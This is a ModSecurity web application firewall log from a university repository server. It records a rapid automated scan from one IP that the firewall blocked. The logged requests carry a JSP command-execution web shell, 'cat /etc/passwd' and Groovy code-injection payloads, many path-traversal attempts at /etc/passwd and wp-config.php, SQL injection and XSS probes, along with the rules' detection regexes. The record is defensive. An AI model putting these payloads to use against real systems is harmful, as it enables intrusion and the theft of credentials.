[Tue Aug 29 11:47:44.401203 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAjtc3UAAAAX"]
[Tue Aug 29 11:47:45.486671 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14ccCo-f0AAAi2yKsAAAAN"]
[Tue Aug 29 11:47:47.228164 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAjrbJkAAAAP"]
[Tue Aug 29 11:47:48.389309 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAjrbJwAAAAP"]
[Tue Aug 29 11:47:49.438962 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/search"] [unique_id "ZO14dcCo-f0AAAkAL8oAAAAU"]
[Tue Aug 29 11:47:49.585491 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAjCbLUAAAAB"]
[Tue Aug 29 11:47:49.586777 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAkBKokAAAAb"]
[Tue Aug 29 11:47:50.390568 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjbw24AAAAW"]
[Tue Aug 29 11:47:50.423836 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAkBKowAAAAb"]
[Tue Aug 29 11:47:50.454286 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAj11@IAAAAa"]
[Tue Aug 29 11:47:51.387591 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\r\\n  "name": "test"\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5cr\\x5cn  \\x22name\\x22: \\x22test\\x22\\x5cr\\x5cn}: {\\x0d\\x0a  \\x22name\\x22: \\x22test\\x22\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/website/blog/"] [unique_id "ZO14d8Co-f0AAAjL8XIAAAAR"]
[Tue Aug 29 11:47:51.460629 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAjqDFcAAAAH"]
[Tue Aug 29 11:47:52.433805 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "repository.unla.ac.id"] [uri "/_search"] [unique_id "ZO14eMCo-f0AAAjL8XUAAAAR"]
[Tue Aug 29 11:47:52.584339 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAjqDFsAAAAH"]
[Tue Aug 29 11:47:53.368444 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAjtc5YAAAAX"]
[Tue Aug 29 11:47:54.425207 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14esCo-f0AAAjCbMMAAAAB"]
[Tue Aug 29 11:47:56.424021 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAkGCVAAAAAE"]
[Tue Aug 29 11:47:57.387939 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAkaC-sAAAAJ"]
[Tue Aug 29 11:47:58.461608 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAkNPqwAAAAI"]
[Tue Aug 29 11:47:58.463078 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAkdu50AAAAO"]
[Tue Aug 29 11:48:00.651817 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14gMCo-f0AAAjy53MAAAAG"]
[Tue Aug 29 11:48:03.356323 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14g8Co-f0AAAkAL@gAAAAU"]
[Tue Aug 29 11:48:03.385320 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAkAL@kAAAAU"]
[Tue Aug 29 11:48:04.438494 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAjy55IAAAAG"]
[Tue Aug 29 11:48:05.359937 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repository.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAjy55QAAAAG"]
[Tue Aug 29 11:48:05.428618 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hcCo-f0AAAkNPssAAAAI"]
[Tue Aug 29 11:48:06.391115 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAjtc6kAAAAX"]
[Tue Aug 29 11:48:06.445116 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAjbw7YAAAAW"]
[Tue Aug 29 11:48:07.507622 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAjM7I0AAAAT"]
[Tue Aug 29 11:48:08.400634 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAjy56IAAAAG"]
[Tue Aug 29 11:48:09.439005 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAklexUAAAAD"]
[Tue Aug 29 11:48:09.462568 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAjYrC4AAAAK"]
[Tue Aug 29 11:48:11.533493 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAkksJAAAAAA"]
[Tue Aug 29 11:48:12.380603 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAkoTfsAAAAH"]
[Tue Aug 29 11:48:12.696155 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAkoTgkAAAAH"]
